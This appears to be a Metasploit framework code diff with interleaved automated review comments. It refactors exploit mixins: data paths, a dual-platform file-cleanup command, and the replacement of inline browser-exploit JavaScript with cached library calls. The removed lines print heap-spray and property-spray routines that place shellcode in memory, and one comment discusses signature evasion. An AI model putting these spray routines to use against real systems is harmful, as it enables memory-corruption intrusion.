+end diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb index 87394a65b5..7e3d05bd71 100644 --- a/lib/msf/core/exploit/cmdstager_vbs.rb +++ b/lib/msf/core/exploit/cmdstager_vbs.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]), ], self.class) end 
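Review bot: The module comment's `a POSIX-conformant printf, that supports the interpretation of octal escapes` reads as a parenthetical because of the comma; the clause is restrictive, so `a POSIX-conformant printf that supports octal escapes (\ooo)` is what is meant. The `create_stager` doc could also spell out the on-disk consequence that the header only hints at, e.g. `# Note: the stager drops an ELF file on the target; consider registering it for cleanup.`, since that is the property a module author comparing this with other command stagers needs. The file otherwise consists of a single delegation to `Rex::Exploitation::CmdStagerPrintf`, whose `require` is not visible here and is presumably pulled in via `msf/core/exploit/cmdstager`; if it is not, a direct `require` would make this mixin self-contained.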
diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb index 2cdb6ca6ad..ddedf4343e 100644 --- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb +++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS::ADODB register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]), ], self.class) end diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 008f5ded8f..8ce6cf1a83 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -47,19 +47,18 @@ module Exploit::FileDropper false end else - cmds = [ + win_cmds = [ %Q|attrib.exe -r "#{win_file}"|, - %Q|del.exe /f /q "#{win_file}"|, - %Q|rm -f "#{file}" >/dev/null|, - ] - + %Q|del.exe /f /q "#{win_file}"| + ] # We need to be platform-independent here. Since we can't be # certain that {#target} is accurate because exploits with # automatic targets frequently change it, we just go ahead and # run both a windows and a unixy command in the same line. One # of them will definitely fail and the other will probably # succeed. Doing it this way saves us an extra round-trip. - session.shell_command_token(cmds.join(" ; ")) + # Trick shared by @mihi42 + session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null") print_good("Deleted #{file}") true end diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index eb0803df60..f185497061 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb 
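Review bot: `file` and `win_file` are interpolated unescaped into the single cleanup command, so a registered path containing `"`, `'`, `;` or `&` breaks the quoting and, on a POSIX shell, lets the remainder of the path run as commands; registered paths normally come from the module itself, but that trust assumption is written down nowhere and deserves a comment such as `# NOTE: file is trusted as-is; it is not shell-escaped before being embedded in the command line`. The mechanism behind the `@mihi42` trick is also left unexplained: on a POSIX shell the `;` ends the `rm` and the following `echo '...'` swallows the entire Windows half as a quoted string, while cmd.exe appears to treat the text up to the first `&` as one failing `rm` invocation followed by `&`-separated `attrib`/`del`/`echo` commands, the last of which neutralises the stray quote — a comment to that effect would spare the next reader the reverse-engineering. One carried-over detail worth verifying: `del` is a cmd.exe builtin and to my knowledge there is no `del.exe` on a stock Windows install, so the `del.exe /f /q` entry in `win_cmds` may never succeed. The enclosing method begins outside this hunk.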
@@ -3,6 +3,7 @@ require 'rex/service_manager' require 'rex/exploitation/obfuscatejs' require 'rex/exploitation/encryptjs' require 'rex/exploitation/heaplib' +require 'rex/exploitation/js' module Msf @@ -677,6 +678,14 @@ protected OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]), OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)', 0]), ], Exploit::Remote::HttpServer::HTML) + + # Cache Javascript + @cache_base64 = nil + @cache_ajax_download = nil + @cache_mstime_malloc = nil + @cache_property_spray = nil + @cache_heap_spray = nil + @cache_os_detect = nil end # 
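Review bot: The six new `@cache_*` instance variables memoize the generated helper JavaScript for the lifetime of the module instance, so every client served by one exploit run receives byte-identical helper code; the implementations removed in the later hunks re-ran `ObfuscateJS` and drew fresh `rand_text_*` symbols on every call, which gave per-response variation. Whether the `Rex::Exploitation::Js::*` builders randomize internally is not visible here, but with this cache any such randomization happens once per instance, a trade-off worth recording next to the declarations: `# Memoized per module instance: helper JS (including any symbol obfuscation) is generated once and reused for every client.` If per-client variation is wanted for signature evasion, the memoization should be dropped or keyed per request. The method these assignments sit in starts before this hunk.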
@@ -708,146 +717,7 @@ protected end def js_base64 - js = <<-ENDJS - // Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html - // variable names changed to make obfuscation easier - var Base64 = { - // private property - _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", - - // private method - _utf8_encode : function ( input ){ - input = input.replace(/\\r\\n/g,"\\n"); - var utftext = ""; - var input_idx; - - for (input_idx = 0; input_idx < input.length; input_idx++) { - var chr = input.charCodeAt(input_idx); - if (chr < 128) { - utftext += String.fromCharCode(chr); - } - else if((chr > 127) && (chr < 2048)) { - utftext += String.fromCharCode((chr >> 6) | 192); - utftext += String.fromCharCode((chr & 63) | 128); - } else { - utftext += String.fromCharCode((chr >> 12) | 224); - utftext += String.fromCharCode(((chr >> 6) & 63) | 128); - utftext += String.fromCharCode((chr & 63) | 128); - } - } - - return utftext; - }, - - // public method for encoding - encode : function( input ) { - var output = ""; - var chr1, chr2, chr3, enc1, enc2, enc3, enc4; - var input_idx = 0; - - input = Base64._utf8_encode(input); - - while (input_idx < input.length) { - chr1 = input.charCodeAt( input_idx++ ); - chr2 = input.charCodeAt( input_idx++ ); - chr3 = input.charCodeAt( input_idx++ ); - - enc1 = chr1 >> 2; - enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); - enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); - enc4 = chr3 & 63; - - if (isNaN(chr2)) { - enc3 = enc4 = 64; - } else if (isNaN(chr3)) { - enc4 = 64; - } - output = output + - this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) + - this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4); - } - return output; - }, - // public method for decoding - decode : function (input) { - var output = ""; - var chr1, chr2, chr3; - var enc1, enc2, enc3, enc4; - var i = 0; - - input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, ""); - - while (i < input.length) { - - enc1 = 
this._keyStr.indexOf(input.charAt(i++)); - enc2 = this._keyStr.indexOf(input.charAt(i++)); - enc3 = this._keyStr.indexOf(input.charAt(i++)); - enc4 = this._keyStr.indexOf(input.charAt(i++)); - - chr1 = (enc1 << 2) | (enc2 >> 4); - chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); - chr3 = ((enc3 & 3) << 6) | enc4; - - output = output + String.fromCharCode(chr1); - - if (enc3 != 64) { - output = output + String.fromCharCode(chr2); - } - if (enc4 != 64) { - output = output + String.fromCharCode(chr3); - } - - } - - output = Base64._utf8_decode(output); - - return output; - - }, - _utf8_decode : function (utftext) { - var string = ""; - var input_idx = 0; - var chr1 = 0; - var chr2 = 0; - var chr3 = 0; - - while ( input_idx < utftext.length ) { - - chr1 = utftext.charCodeAt(input_idx); - - if (chr1 < 128) { - string += String.fromCharCode(chr1); - input_idx++; - } - else if((chr1 > 191) && (chr1 < 224)) { - chr2 = utftext.charCodeAt(input_idx+1); - string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63)); - input_idx += 2; - } else { - chr2 = utftext.charCodeAt(input_idx+1); - chr3 = utftext.charCodeAt(input_idx+2); - string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63)); - input_idx += 3; - } - } - - return string; - } - - - }; - - ENDJS - opts = { - 'Symbols' => { - 'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx - input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 }, - 'Methods' => %w{ _utf8_encode _utf8_decode encode decode } - } - } - js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) - - return js + @cache_base64 ||= Rex::Exploitation::Js::Utils.base64 end 
@@ -870,34 +740,7 @@ protected # # def js_ajax_download - %Q|function ajax_download(oArg) { - method = oArg.method; - path = oArg.path; - data = oArg.data; - - if (method == undefined) { method = "GET"; } - if (method == path) { throw "Missing parameter 'path'"; } - if (data == undefined) { data = null; } - - if (window.XMLHttpRequest) { - xmlHttp = new XMLHttpRequest(); - } - else { - xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); - } - - if (xmlHttp.overrideMimeType) { - xmlHttp.overrideMimeType("text/plain; charset=x-user-defined"); - } - - xmlHttp.open(method, path, false); - xmlHttp.send(data); - if (xmlHttp.readyState == 4 && xmlHttp.status == 200) { - return xmlHttp.responseText; - } - return null; - } - | + @cache_ajax_download ||= Rex::Exploitation::Js::Network.ajax_download end @@ -933,39 +776,7 @@ protected # # def js_mstime_malloc - %Q| - function mstime_malloc(oArg) { - shellcode = oArg.shellcode; - offset = oArg.offset; - heapBlockSize = oArg.heapBlockSize; - objId = oArg.objId; - - if (shellcode == undefined) { throw "Missing argument: shellcode"; } - if (offset == undefined) { offset = 0; } - if (heapBlockSize == undefined) { throw "Size must be defined"; } - - buf = ""; - for (i=0; i < heapBlockSize/4; i++) { - if (i == offset) { - if (i == 0) { buf += shellcode; } - else { buf += ";" + shellcode; } - } - else { - buf += ";##{Rex::Text.rand_text_hex(6)}"; - } - } - - e = document.getElementById(objId); - if (e == null) { - eleId = "#{Rex::Text.rand_text_alpha(5)}" - acTag = "" - document.body.innerHTML = document.body.innerHTML + acTag; - e = document.getElementById(eleId); - } - try { e.values = buf; } - catch (e) {} - } - | + @cache_mstime_malloc ||= Rex::Exploitation::Js::Memory.mstime_malloc end # 
@@ -984,90 +795,22 @@ protected # # Example of using the 'sprayHeap' function: # # def js_property_spray - sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5) - js = %Q| - var #{sym_div_container}; - function sprayHeap( oArg ) { - - shellcode = oArg.shellcode; - offset = oArg.offset; - heapBlockSize = oArg.heapBlockSize; - maxAllocs = oArg.maxAllocs; - objId = oArg.objId; - - if (shellcode == undefined) { throw "Missing argument: shellcode"; } - if (offset == undefined) { offset = 0x00; } - if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } - if (maxAllocs == undefined) { maxAllocs = 0x350; } - - if (offset > 0x800) { throw "Bad alignment"; } - - #{sym_div_container} = document.getElementById(objId); - - if (#{sym_div_container} == null) { - #{sym_div_container} = document.createElement("div"); - } - - #{sym_div_container}.style.cssText = "display:none"; - var data; - junk = unescape("%u2020%u2020"); - while (junk.length < offset+0x1000) junk += junk; - - data = junk.substring(0,offset) + shellcode; - data += junk.substring(0,0x800-offset-shellcode.length); - - while (data.length < heapBlockSize) data += data; - - for (var i = 0; i < maxAllocs; i++) - { - var obj = document.createElement("button"); - obj.title = data.substring(0, (heapBlockSize-2)/2); - #{sym_div_container}.appendChild(obj); - } - } - | + @cache_property_spray ||= Rex::Exploitation::Js::Memory.property_spray end def js_heap_spray - js = %Q|var memory = new Array(); -function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) { - var index; - var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16); - var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16); - while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; } - while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; } - - var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo); - while (retSlide.length < heapBlockSize) { retSlide += retSlide; } - retSlide 
= retSlide.substring(0, heapBlockSize - shellcode.length); - - var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize; - for (index = 0; index < heapBlockCnt; index++) { - memory[index] = retSlide + shellcode; - } -} -| - opts = { - 'Symbols' => { - 'Variables' => %w{ shellcode retSlide payLoadSize memory index - heapSprayAddr_lo heapSprayAddr_hi heapSprayAddr heapBlockSize - heapBlockCnt }, - 'Methods' => %w{ sprayHeap } - } - } - js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) - return js + @cache_heap_spray ||= Rex::Exploitation::Js::Memory.heap_spray end def js_os_detect - return ::Rex::Exploitation::JavascriptOSDetect.new + @cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os end # Transmits a html response to the supplied client diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb index 216d41f091..491babc19a 100644 --- a/lib/msf/core/exploit/java.rb +++ b/lib/msf/core/exploit/java.rb @@ -51,7 +51,7 @@ module Exploit::Java # Instantiate the JVM with a classpath pointing to the JDK tools.jar # and our javatoolkit jar. - classpath = File.join(Msf::Config.install_root, "data", "exploits", "msfJavaToolkit.jar") + classpath = File.join(Msf::Config.data_directory, "exploits", "msfJavaToolkit.jar") classpath += ":" + toolsjar classpath += ":" + datastore['ADDCLASSPATH'] if datastore['ADDCLASSPATH'] diff --git a/lib/msf/core/exploit/local/unix.rb b/lib/msf/core/exploit/local/unix.rb deleted file mode 100644 index 5a35ebbe63..0000000000 --- a/lib/msf/core/exploit/local/unix.rb +++ /dev/null @@ -1,19 +0,0 @@ - -module Msf -module Exploit::Local::Unix - - include Exploit::Local::CompileC - - def unix_socket_h(metasm_exe) - [ - "external/source/meterpreter/source/bionic/libc/include/sys/socket.h", - ].each do |fname| - cparser.parse(File.read(fname), fname) - end - - end - - -end -end - diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 810f87492e..b1dd01add0 100644 --- a/lib/msf/core/exploit/mixins.rb 
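Review bot: `js_heap_spray` previously returned an `ObfuscateJS` instance built with an explicit symbol table and `js_os_detect` a `JavascriptOSDetect` object; both now return whatever `Rex::Exploitation::Js::Memory.heap_spray` and `Rex::Exploitation::Js::Detect.os` yield, and `js_property_spray` no longer embeds its per-call random container name. Callers that invoked methods on the old return values (for instance to resolve an obfuscated symbol name) will break if the new objects do not expose the same interface, which cannot be checked from this hunk. Each of the three methods should therefore carry a `# @return [...]` line naming the concrete type now returned, so the contract is explicit and the change is reviewable. The three methods are complete within the hunk; the surrounding `protected` section continues outside it.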
+++ b/lib/msf/core/exploit/mixins.rb @@ -26,6 +26,7 @@ require 'msf/core/exploit/cmdstager_debug_asm' require 'msf/core/exploit/cmdstager_tftp' require 'msf/core/exploit/cmdstager_bourne' require 'msf/core/exploit/cmdstager_echo' +require 'msf/core/exploit/cmdstager_printf' # Protocol require 'msf/core/exploit/tcp' diff --git a/lib/msf/core/exploit/mssql.rb b/lib/msf/core/exploit/mssql.rb index 3c52a62774..5b3466dda1 100644 --- a/lib/msf/core/exploit/mssql.rb +++ b/lib/msf/core/exploit/mssql.rb @@ -75,7 +75,7 @@ module Exploit::Remote::MSSQL register_advanced_options( [ OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk", - File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b") + File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b") ]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION']) ], Msf::Exploit::Remote::MSSQL) diff --git a/lib/msf/core/exploit/mssql_sqli.rb b/lib/msf/core/exploit/mssql_sqli.rb index 4f5f5c36b2..415da84c67 100644 --- a/lib/msf/core/exploit/mssql_sqli.rb +++ b/lib/msf/core/exploit/mssql_sqli.rb @@ -34,7 +34,7 @@ module Exploit::Remote::MSSQL_SQLI register_advanced_options( [ OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk", - File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b") + File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b") ]) ], Msf::Exploit::Remote::MSSQL_SQLI) diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index 82a07f6619..23a26ad7c5 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb 
@@ -150,7 +150,7 @@ module Exploit::Remote::MYSQL def mysql_upload_sys_udf(arch=:win32,target_path=nil) fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll") - sys_dll = File.join( Msf::Config.install_root, "data", "exploits", "mysql", fname ) + sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname ) data = File.open(sys_dll, "rb") {|f| f.read f.stat.size} blob = "0x" blob << data.unpack("C*").map {|x| "%02x" % [x]}.join diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index e5bdf69cc3..c424182883 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -116,7 +116,7 @@ module Exploit::Powershell ps_wrapper = <